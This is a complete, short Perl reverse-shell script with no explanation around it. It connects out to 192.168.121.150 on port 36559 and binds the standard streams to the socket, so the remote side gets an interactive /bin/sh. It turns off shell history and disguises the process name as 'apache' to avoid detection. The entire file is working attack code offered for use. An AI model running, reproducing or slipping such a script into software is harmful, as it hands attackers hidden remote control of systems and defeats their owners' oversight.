use Socket;
my $VERSION = "1.0";
my $ip = '192.168.121.150';
my $port = 36559;socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCK, sockaddr_in($port,inet_aton($ip)));
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
exec({"/bin/sh"} ("apache", "-i"));